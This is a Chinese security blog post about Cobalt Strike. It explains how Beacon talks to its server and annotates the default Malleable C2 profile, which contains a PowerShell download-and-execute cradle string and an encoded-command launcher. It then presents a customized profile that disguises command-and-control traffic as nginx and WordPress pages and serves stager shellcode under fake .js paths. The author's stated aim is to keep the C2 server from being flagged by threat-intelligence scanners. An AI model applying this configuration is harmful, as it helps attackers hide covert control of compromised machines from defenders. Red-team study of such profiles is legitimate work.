自定义CS profile配置文件

default.profile是CobaltStrike自带的配置文件

这个文件可以自定义许多信息，比如web请求地址，默认睡眠时长等，这次挑几个来说一下

0x01 CS通信机制

网上已经有很多详细的解释了，我就写个简单的解释

用过CS的师傅都知道有睡眠，如果你要执行命令则会在睡眠结束后返回命令

在没有执行任何命令的情况下，客户端会向服务端发送一个GET请求，请求里会带着客户端的基本信息，具体在哪里需要看profile的配置

执行命令后，客户端也会发送一个GET请求，告诉服务端自己要执行命令了，服务端会下发一个id和具体任务要求，客户端执行完后会将结果POST回去

这里不涉及流量加解密，以后再写文章吧

0x02 默认配置

先看自带的配置文件

# default sleep time is 60s
set sleeptime "60000";				//默认六十秒睡眠时间

# jitter factor 0-99% [randomize callback times]
set jitter    "0";					//随机时间

# indicate that this is the default Beacon profile
set sample_name "Cobalt Strike Beacon (Default)";		//就是一个名字

# this is the default profile. Make sure we look like Cobalt Strike's Beacon payload. (that's what we are, right?)
stage {							//beacon.dll会按照这里配置生成
	set stomppe "false";		//关闭轻度混淆		
	set name    "beacon.dll";	//要修改的文件名

	string "%d.%s";				//添加到文件的字符串	
	string "post";
	string "%s%s";
	string "cdn.%x%x.%s";
	string "www6.%x%x.%s";
	string "%s.1%x.%x%x.%s";
	string "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.1%08x%08x%08x%08x%08x.%x%x.%s";
	string "%s.1%08x%08x%08x%08x.%x%x.%s";
	string "%s.1%08x%08x%08x.%x%x.%s";
	string "%s.1%08x%08x.%x%x.%s";
	string "%s.1%08x.%x%x.%s";
	string "api.%x%x.%s";
	string "unknown";
	string "could not run command (w/ token) because of its length of %d bytes!";
	string "could not spawn %s (token): %d";
	string "could not spawn %s: %d";
	string "Could not open process token: %d (%u)";
	string "could not run %s as %s\\%s: %d";
	string "COMSPEC";
	string " /C ";
	string "could not upload file: %d";
	string "could not open %s: %d";
	string "could not get file time: %d";
	string "could not set file time: %d";
	string "127.0.0.1";
	string "Could not connect to pipe (%s): %d";
	string "Could not open service control manager on %s: %d";
	string "Could not create service %s on %s: %d";
	string "Could not start service %s on %s: %d";
	string "Started service %s on %s";
	string "Could not query service %s on %s: %d";
	string "Could not delete service %s on %s: %d";
	string "SeDebugPrivilege";
	string "SeTcbPrivilege";
	string "SeCreateTokenPrivilege";
	string "SeAssignPrimaryTokenPrivilege";
	string "SeLockMemoryPrivilege";
	string "SeIncreaseQuotaPrivilege";
	string "SeUnsolicitedInputPrivilege";
	string "SeMachineAccountPrivilege";
	string "SeSecurityPrivilege";
	string "SeTakeOwnershipPrivilege";
	string "SeLoadDriverPrivilege";
	string "SeSystemProfilePrivilege";
	string "SeSystemtimePrivilege";
	string "SeProfileSingleProcessPrivilege";
	string "SeIncreaseBasePriorityPrivilege";
	string "SeCreatePagefilePrivilege";
	string "SeCreatePermanentPrivilege";
	string "SeBackupPrivilege";
	string "SeRestorePrivilege";
	string "SeShutdownPrivilege";
	string "SeAuditPrivilege";
	string "SeSystemEnvironmentPrivilege";
	string "SeChangeNotifyPrivilege";
	string "SeRemoteShutdownPrivilege";
	string "SeUndockPrivilege";
	string "SeSyncAgentPrivilege";
	string "SeEnableDelegationPrivilege";
	string "SeManageVolumePrivilege";
	string "Could not create service: %d";
	string "Could not start service: %d";
	string "Failed to impersonate token: %d";
	string "Failed to get token";
	string "IsWow64Process";
	string "kernel32";
	string "Could not open '%s'";
	string "%s\\%s";
	string "copy failed: %d";
	string "move failed: %d";
	string "D	0	%02d/%02d/%02d %02d:%02d:%02d	%s";
	string "F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s";
	string "Wow64DisableWow64FsRedirection";
	string "Wow64RevertWow64FsRedirection";
	string "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.";
	string "could not allocate %d bytes in process: %d";
	string "could not write to process memory: %d";
	string "could not adjust permissions in process: %d";
	string "could not create remote thread in %d: %d";
	string "could not open process %d: %d";
	string "%d is an x64 process (can't inject x86 content)";
	string "%d is an x86 process (can't inject x64 content)";
	string "syswow64";
	string "system32";
	string "Could not set PPID to %d: %d";
	string "Could not set PPID to %d";
	string "ntdll";
	string "NtQueueApcThread";
	string "%ld	";
	string "%.2X";
	string "%.2X:";
	string "process";
	string "Could not connect to pipe: %d";
	string "%d	%d	%s";
	string "Kerberos";
	string "kerberos ticket purge failed: %08x";
	string "kerberos ticket use failed: %08x";
	string "could not connect to pipe: %d";
	string "could not connect to pipe";
	string "Maximum links reached. Disconnect one";
	string "%d	%d	%d.%d	%s	%s	%s	%d	%d";
	string "Could not bind to %d";
	string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')";
	string "%%IMPORT%%";
	string "Command length (%d) too long";
	string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s";
	string "powershell -nop -exec bypass -EncodedCommand \"%s\"";
	string "?%s=%s";
	string "%s&%s=%s";
	string "%s%s: %s";
	string "%s&%s";
	string "%s%s";
	string "Could not kill %d: %d";
	string "%s	%d	%d";
	string "%s	%d	%d	%s	%s	%d";
	string "%s\\*";
	string "sha256";
	string "abcdefghijklmnop";
	string "sprng";
	string "could not create pipe: %d";
	string "I'm already in SMB mode";
	string "%s (admin)";
	string "Could not open process: %d (%u)";
	string "Failed to impersonate token from %d (%u)";
	string "Failed to duplicate primary token for %d (%u)";
	string "Failed to impersonate logged on user %d (%u)";
	string "Could not create token: %d";
	string "HTTP/1.1 200 OK";=

//这里是get请求，请求到下面的路径都会存在
# define indicators for an HTTP GET
http-get {
	# Beacon will randomly choose from this pool of URIs
	set uri "/ca /dpixel /__utm.gif /pixel.gif /g.pixel /dot.gif /updates.rss /fwlink /cm /cx /pixel /match /visit.js /load /push /ptj /j.ad /ga.js /en_US/all.js /activity /IE9CompatViewList.xml";

//这里是客户端请求服务端的格式，前面说的基础信息就会通过base64加密后请求
	client {
		# base64 encode session metadata and store it in the Cookie header.
		metadata {
			base64;
			header "Cookie";
		}
	}
//这里是服务端的返回包，类型为application/octet-stream，如果有需要下发的任务id和任务就直接输出
	server {
		# server should send output with no changes
		header "Content-Type" "application/octet-stream";

		output {
			print;
		}
	}
}

# define indicators for an HTTP 
http-post {
	# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
	set uri "/submit.php";			//定义请求路径
	//定义请求头
	client {
		header "Content-Type" "application/octet-stream";				

		# transmit our session identifier as /submit.php?id=[identifier]
        //这里就是任务id
		id {				
			parameter "id";
		}

		# post our output with no real changes
		output {			//直接打印结果
			print;
		}
	}

	# The server's response to our HTTP POST
	server {
		header "Content-Type" "text/html";		//定义返回包类型

		# this will just print an empty string, meh...
		output {
			print;						//直接打印结果
		}
	}
}

//下面是dnsbeacon的配置先不写了，因为还没用过dnsbeacon
# define indicators/attributes for a DNS Beacon
dns-beacon {
    # maximum number of bytes to send in a DNS A record request
    set maxdns    "255";

    set beacon "";
    set get_A "cdn.";
    set get_AAAA "www6.";
    set get_TXT "api.";
    set put_metadata "www.";
    set put_output "post.";
}

像微步平台都能查看是否为恶意服务器，基本这个默认配置都会被发现，直接扫描一下http-get和http-get里面定义的路径是否存在，如果都存在就是个C2服务器，为了避免被标记修改修改配置文件

0x03 修改配置

https://github.com/rsmudge/Malleable-C2-Profiles

这项目有很多profile的实例

主要是最近看了一下云函数，使用云函数要修改profile，直接拿云函数那个profile来说吧

set sleeptime "10000";		//上线睡眠默认十秒
set jitter    "0";			//不随机
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";			//设置请求头

http-get {

    set uri "/index.html";				//定义路径

    client {
        header "Accept" "*/*";		//定义请求头
        metadata {
            base64;				//数据用base64加密
            prepend "SESSIONID=";//加密后的数据放到SESSIONID
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "text/html; charset=utf-8";//定义返回请求头
        header "content-transfer-encoding" "binary";
        header "Server" "nginx";
        output {
            base64;				//输出结果base64编码
            append "index";	    //这里有个小细节，append一定要写在base64后面，不然会一起编码
            print;				//输出
        }
    }
}

//这里定义的是下载payload的位置，之前说过cs的reverse的shellcode功能是从服务器下载主要功能的shellcode，如果不定义这个就会生成一个随机四个字符串
http-stager {  
    set uri_x86 "/vue.min.js";				//32位shellcode存放地址
    set uri_x64 "/bootstrap-2.min.js";		//64位shellcode存放地址
}

//下面重复的就不写了
http-post {
    set uri "/wp-admin.php";			//post路径
    client {
        header "Accept" "*/*";
        //这里的id就是任务id。post命令执行结果的时候就是用这里的
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";  //这样写格式最后在数据包的格式为Cookie: JSESSION=base64(id)
        }
        output {
            base64;		//post的数据为base64编码
            print;
        }
    }
	//同样是定义服务端的返回头和数据
    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {				
            base64;
            print;
        }
    }
}

这样修改过之后有网络爬虫来也只会认为是一个正常的网站，可能只是页面有问题所以不显示，那些识别cms的工具都是通过扫专门文件来判断使用的是什么cms，写个wp-admin可能就会被认为是wp的网站

这文件有注释肯定是用不了的，后面放一个没注释过的，也省的师傅们删掉

写好的profile可以用CS自带的c2lint测试是否可用

这样使用自定义的profile

0x04 参考资料

https://shanfenglan.blog.csdn.net/article/details/107791606

https://www.chabug.org/web/832.html

https://www.cobaltstrike.com/help-malleable-c2

Macchiato

2021-09-29

WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

Javaweb

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

PWN

CTF

heap

Windows内核学习

其它

关于博客

面试

杂谈

自定义CS profile配置文件

0x01 CS通信机制

0x02 默认配置

0x03 修改配置

0x04 参考资料